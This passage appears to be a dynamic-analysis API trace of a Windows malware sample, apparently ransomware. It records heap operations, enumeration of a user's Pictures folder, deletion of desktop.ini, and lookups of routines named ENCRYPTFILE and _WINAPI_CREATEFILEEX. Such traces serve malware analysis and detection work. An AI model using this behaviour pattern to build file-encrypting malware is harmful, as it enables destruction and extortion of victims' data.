lpFilePart=0x0) returned 0x24 [0087.630] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\desktop.ini" (normalized: "c:\\users\\fd1hvy\\pictures\\desktop.ini")) returned 0x26 [0087.630] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e00 [0087.631] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2280 [0087.631] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9cc8 [0087.631] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2290 [0087.631] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c50 [0087.631] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2150 [0087.631] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9dd0 [0087.631] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2140 [0087.631] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Pictures\\desktop.ini", lpFindFileData=0x144f1d8 | out: lpFindFileData=0x144f1d8*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x44053085, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0x44053085, ftLastAccessTime.dwHighDateTime=0x1d32722, ftLastWriteTime.dwLowDateTime=0xce2f1526, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x1f8, dwReserved0=0x356310, dwReserved1=0xdf0000, cFileName="desktop.ini", cAlternateFileName="")) returned 0x41ac600 [0087.631] DeleteFileW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\desktop.ini" (normalized: "c:\\users\\fd1hvy\\pictures\\desktop.ini")) returned 1 [0087.632] FindNextFileW (in: hFindFile=0x41ac600, lpFindFileData=0x144f1d8 | out: lpFindFileData=0x144f1d8*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x44053085, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0x44053085, ftLastAccessTime.dwHighDateTime=0x1d32722, ftLastWriteTime.dwLowDateTime=0xce2f1526, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x1f8, dwReserved0=0x356310, dwReserved1=0xdf0000, cFileName="desktop.ini", cAlternateFileName="")) returned 0 [0087.632] FindClose (in: hFindFile=0x41ac600 | out: hFindFile=0x41ac600) returned 1 [0087.632] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391d58 | out: hHeap=0x1780000) returned 1 [0087.632] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e22f0 | out: hHeap=0x1780000) returned 1 [0087.633] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c80 | out: hHeap=0x1780000) returned 1 [0087.633] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2130 | out: hHeap=0x1780000) returned 1 [0087.633] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x436a088 | out: hHeap=0x1780000) returned 1 [0087.633] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2190 | out: hHeap=0x1780000) returned 1 [0087.633] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d28 | out: hHeap=0x1780000) returned 1 [0087.633] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d40 | out: hHeap=0x1780000) returned 1 [0087.633] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf630 | out: hHeap=0x1780000) returned 1 [0087.633] PeekMessageW (in: lpMsg=0x144f534, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f534) returned 0 [0087.633] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac100 | out: hHeap=0x1780000) returned 1 [0087.633] PeekMessageW (in: lpMsg=0x144f534, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f534) returned 0 [0087.633] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8f00 | out: hHeap=0x1780000) returned 1 [0087.633] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c68 | out: hHeap=0x1780000) returned 1 [0087.633] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9950 | out: hHeap=0x1780000) returned 1 [0087.633] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9908 | out: hHeap=0x1780000) returned 1 [0087.633] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2300 | out: hHeap=0x1780000) returned 1 [0087.633] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf608 | out: hHeap=0x1780000) returned 1 [0087.633] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9890 | out: hHeap=0x1780000) returned 1 [0087.633] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2270 | out: hHeap=0x1780000) returned 1 [0087.633] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf5e0 | out: hHeap=0x1780000) returned 1 [0087.633] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x40a8190 | out: hHeap=0x1780000) returned 1 [0087.633] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2220 | out: hHeap=0x1780000) returned 1 [0087.633] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9b78 | out: hHeap=0x1780000) returned 1 [0087.633] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9b60 | out: hHeap=0x1780000) returned 1 [0087.633] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf388 | out: hHeap=0x1780000) returned 1 [0087.633] PeekMessageW (in: lpMsg=0x144f78c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f78c) returned 0 [0087.633] PeekMessageW (in: lpMsg=0x144f78c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f78c) returned 0 [0087.633] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2230 [0087.633] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf5e0 [0087.634] CharUpperBuffW (in: lpsz="ENCRYPTFILE", cchLength=0xb | out: lpsz="ENCRYPTFILE") returned 0xb [0087.634] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf5e0 | out: hHeap=0x1780000) returned 1 [0087.634] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2230 | out: hHeap=0x1780000) returned 1 [0087.634] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf770 [0087.634] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e22f0 [0087.634] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf428 [0087.634] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9908 [0087.634] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2150 [0087.634] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9b60 [0087.634] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2190 [0087.634] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797088 [0087.634] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9950 [0087.634] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e21a0 [0087.634] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9218 [0087.634] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9950 | out: hHeap=0x1780000) returned 1 [0087.634] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e21f0 [0087.634] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e21f0 | out: hHeap=0x1780000) returned 1 [0087.634] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9b78 [0087.634] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc0) returned 0x1b22250 [0087.634] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a9218 | out: hHeap=0x1780000) returned 1 [0087.634] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9b78 | out: hHeap=0x1780000) returned 1 [0087.634] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797088 | out: hHeap=0x1780000) returned 1 [0087.634] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2190 | out: hHeap=0x1780000) returned 1 [0087.634] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2150 | out: hHeap=0x1780000) returned 1 [0087.634] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43c9b78 [0087.634] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf388 [0087.634] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9950 [0087.634] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2300 [0087.634] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9890 [0087.634] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d88 [0087.635] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8cc0 [0087.635] PeekMessageW (in: lpMsg=0x144f534, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f534) returned 0 [0087.635] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2130 [0087.635] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2270 [0087.635] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796fc8 [0087.635] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796fc8 | out: hHeap=0x1780000) returned 1 [0087.635] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2270 | out: hHeap=0x1780000) returned 1 [0087.635] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2130 | out: hHeap=0x1780000) returned 1 [0087.635] PeekMessageW (in: lpMsg=0x144f534, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f534) returned 0 [0087.635] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2130 [0087.635] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf798 [0087.635] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d70 [0087.635] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2140 [0087.635] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d10 [0087.635] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2140 | out: hHeap=0x1780000) returned 1 [0087.635] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Pictures\\eY_MSASCT-tpPguP.bmp", lpFindFileData=0x144f078 | out: lpFindFileData=0x144f078*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x66b95a40, ftCreationTime.dwHighDateTime=0x1d5ed44, ftLastAccessTime.dwLowDateTime=0xe0c46f90, ftLastAccessTime.dwHighDateTime=0x1d5e287, ftLastWriteTime.dwLowDateTime=0xe0c46f90, ftLastWriteTime.dwHighDateTime=0x1d5e287, nFileSizeHigh=0x0, nFileSizeLow=0x1463f, dwReserved0=0x10189fc, dwReserved1=0x8, cFileName="eY_MSASCT-tpPguP.bmp", cAlternateFileName="EY_MSA~1.BMP")) returned 0x41ac000 [0087.635] FindClose (in: hFindFile=0x41ac000 | out: hFindFile=0x41ac000) returned 1 [0087.635] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d10 | out: hHeap=0x1780000) returned 1 [0087.635] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d70 | out: hHeap=0x1780000) returned 1 [0087.635] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf798 | out: hHeap=0x1780000) returned 1 [0087.635] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e21f0 [0087.635] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796d68 [0087.635] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2270 [0087.635] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391e70 [0087.635] CharUpperBuffW (in: lpsz="_WINAPI_FILEINUSE", cchLength=0x11 | out: lpsz="_WINAPI_FILEINUSE") returned 0x11 [0087.636] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391e70 | out: hHeap=0x1780000) returned 1 [0087.636] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2270 | out: hHeap=0x1780000) returned 1 [0087.636] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf5e0 [0087.636] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2140 [0087.636] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf608 [0087.636] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9ba8 [0087.636] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2200 [0087.636] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e00 [0087.636] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2200 | out: hHeap=0x1780000) returned 1 [0087.636] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43c9c68 [0087.636] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf658 [0087.636] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e18 [0087.636] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2150 [0087.636] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9e18 | out: hHeap=0x1780000) returned 1 [0087.636] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf450 [0087.636] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9cc8 [0087.636] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9cf8 [0087.636] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8b58 [0087.636] PeekMessageW (in: lpMsg=0x144f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f114) returned 0 [0087.636] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf630 [0087.636] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d70 [0087.636] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2200 [0087.636] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d40 [0087.636] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c80 [0087.636] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2220 [0087.636] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c80 | out: hHeap=0x1780000) returned 1 [0087.636] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2180 [0087.636] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391c08 [0087.636] CharUpperBuffW (in: lpsz="_WINAPI_CREATEFILEEX", cchLength=0x14 | out: lpsz="_WINAPI_CREATEFILEEX") returned 0x14 [0087.636] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391c08 | out: hHeap=0x1780000) returned 1 [0087.636] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2180 | out: hHeap=0x1780000) returned 1 [0087.637] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf798 [0087.637] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2230 [0087.637] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf4a0 [0087.637] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d10 [0087.637] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2240 [0087.637] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9bd8 [0087.637] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2240 | out: hHeap=0x1780000) returned 1 [0087.637] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2180 [0087.637] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d58 [0087.637] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2190 [0087.637] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2190 | out: hHeap=0x1780000) returned 1 [0087.637] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2190 [0087.637] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c50 [0087.637] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2240 [0087.637] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2240 | out: hHeap=0x1780000) returned 1 [0087.637] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43c9d28 [0087.637] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf4c8 [0087.637] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c80 [0087.637] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2240 [0087.637] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c80 | out: hHeap=0x1780000) returned 1 [0087.637] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf7c0 [0087.637] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9dd0 [0087.637] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c80 [0087.637] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb30 [0087.637] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e78 [0087.637] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2270 [0087.637] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9e78 | out: hHeap=0x1780000) returned 1 [0087.637] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf950 [0087.637] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e18 [0087.638] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf978 [0087.638] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e30 [0087.638] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2280 [0087.638] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e78 [0087.638] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2290 [0087.638] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2290 | out: hHeap=0x1780000) returned 1 [0087.638] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfa68 [0087.638] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9b90 [0087.638] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2290 [0087.638] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9bc0 [0087.638] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2470 [0087.638] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2470 | out: hHeap=0x1780000) returned 1 [0087.638] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc48 [0087.638] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9bf0 [0087.638] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2470 [0087.638] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9bf0 | out: hHeap=0x1780000) returned 1 [0087.638] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391e70 [0087.638] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9bf0 [0087.638] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2450 [0087.638] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2450 | out: hHeap=0x1780000) returned 1 [0087.638] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb58 [0087.638] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca0d0 [0087.638] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2480 [0087.638] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca0d0 | out: hHeap=0x1780000) returned 1 [0087.638] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfce8 [0087.638] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca0d0 [0087.638] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24e0 [0087.638] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24e0 | out: hHeap=0x1780000) returned 1 [0087.638] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd10 [0087.639] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca118 [0087.639] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2450 [0087.639] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca118 | out: hHeap=0x1780000) returned 1 [0087.639] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfa90 [0087.639] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca118 [0087.639] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a90f8 [0087.639] PeekMessageW (in: lpMsg=0x144ebfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebfc) returned 0 [0087.639] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf900 [0087.639] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca160 [0087.639] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2490 [0087.639] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9ef0 [0087.639] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca178 [0087.639] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24a0 [0087.639] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca178 | out: hHeap=0x1780000) returned 1 [0087.639] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf9a0 [0087.639] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca178 [0087.639] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24b0 [0087.666] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e90 [0087.667] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24b0 | out: hHeap=0x1780000) returned 1 [0087.667] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9f08 [0087.667] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24b0 [0087.667] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca418 [0087.667] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24b0 | out: hHeap=0x1780000) returned 1 [0087.667] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca298 [0087.667] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24f0 [0087.667] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca220 [0087.667] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24f0 | out: hHeap=0x1780000) returned 1 [0087.667] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca358 [0087.667] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24b0 [0087.667] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3a0 [0087.667] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24b0 | out: hHeap=0x1780000) returned 1 [0087.667] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca190 [0087.667] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2340 [0087.667] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca2b0 [0087.667] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2340 | out: hHeap=0x1780000) returned 1 [0087.667] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca268 [0087.667] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24b0 [0087.667] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca430 [0087.667] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24b0 | out: hHeap=0x1780000) returned 1 [0087.667] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1d8 [0087.667] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24b0 [0087.667] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24b0 | out: hHeap=0x1780000) returned 1 [0087.667] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca340 [0087.667] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24b0 [0087.667] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca2e0 [0087.667] HeapFree (in: 